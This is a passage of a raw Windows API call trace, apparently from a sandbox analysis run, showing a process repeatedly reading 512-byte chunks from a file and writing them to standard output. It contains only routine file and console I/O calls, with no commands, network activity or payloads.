lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] GetFileType (hFile=0x50) returned 0x1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] GetFileType (hFile=0x50) returned 0x1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] GetFileType (hFile=0x50) returned 0x1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.811] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.811] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] GetFileType (hFile=0x50) returned 0x1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] GetFileType (hFile=0x50) returned 0x1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] GetFileType (hFile=0x50) returned 0x1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.812] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.812] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] GetFileType (hFile=0x50) returned 0x1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] GetFileType (hFile=0x50) returned 0x1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] GetFileType (hFile=0x50) returned 0x1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] GetFileType (hFile=0x50) returned 0x1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] GetFileType (hFile=0x50) returned 0x1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] GetFileType (hFile=0x50) returned 0x1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] GetFileType (hFile=0x50) returned 0x1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] GetFileType (hFile=0x50) returned 0x1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.813] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.813] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] GetFileType (hFile=0x50) returned 0x1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] GetFileType (hFile=0x50) returned 0x1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] GetFileType (hFile=0x50) returned 0x1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.814] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.814] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.815] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.815] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] GetFileType (hFile=0x50) returned 0x1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] GetFileType (hFile=0x50) returned 0x1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] GetFileType (hFile=0x50) returned 0x1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] GetFileType (hFile=0x50) returned 0x1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] GetFileType (hFile=0x50) returned 0x1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] GetFileType (hFile=0x50) returned 0x1 [0212.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.816] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.816] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.816] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.817] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.817] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] GetFileType (hFile=0x50) returned 0x1 [0212.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.817] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.818] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.818] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle 